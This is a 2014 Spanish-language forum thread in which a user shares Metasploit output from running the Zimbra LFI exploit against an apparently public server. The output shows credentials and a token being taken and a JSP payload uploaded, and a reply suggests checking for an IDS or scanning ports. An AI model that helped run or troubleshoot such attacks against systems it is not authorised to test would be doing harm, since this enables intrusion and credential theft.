[SOLUCIONADO] Metasploit - Exploit zimbra

Iniciado por Gyprus, Junio 13, 2014, 12:34:33 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Junio 13, 2014, 12:34:33 PM Ultima modificación: Septiembre 02, 2014, 04:07:13 PM por Expermicid
Exploit: exploit/unix/webapp/zimbra_lfi

RHOST: la ip al que voy a "atacar"
LHOST: ip local de la maquina virtual
puertos: Default RPORT : 7071 y Local: 4444

Y lo que me pasa es esto:

  • 200..x.xx.x.x:7071 - Getting login credentials...
  • 200.xx.xxx.xx:7071 - Got login credentials!
  • 200.xx.x.xx.x:7071 - Getting auth token...
  • You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login:7071 - Got auth token!
  • 200.xx.xx.x.x.x:7071 - Uploading payload
  • 200.xx.x.x.xx:7071 - Uploading jsp stager
  • 200.xx.xx.x.x:7071 - Executing payload on /downloads/dwZUmvrbqpKCV.jsp
    [!] This exploit may require manual cleanup of '../jetty/webapps/zimbra/downloads/dwZUmvrbqpKCV.jsp' on the target
    [!] This exploit may require manual cleanup of '../jetty/webapps/zimbra/downloads/nCFqzvYjOAFiS' on the target
    msf exploit(zimbra_lfi) >

    Y que ahí supuestamente tendria que salir la session pero eso no pasa. Creo que puede ser un error de puertos ,dmz o bien el host no es vuln. Ayuda? :P Desde ya muchas gracias
Junio 14, 2014, 04:35:57 PM #1
Que te hace creer que el servidor es Vulnerable?

Puede andar de por medio algun amiguito IDS, IPS el cual esta obstruyendo, como tambien el puerto :) le pasaste un nmap o alguna herramienta parecida, para identificar puertos vulnerablidades?

Regards,
Snifer
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!


Imprimir
Ir Arriba Páginas1
Acciones del Usuario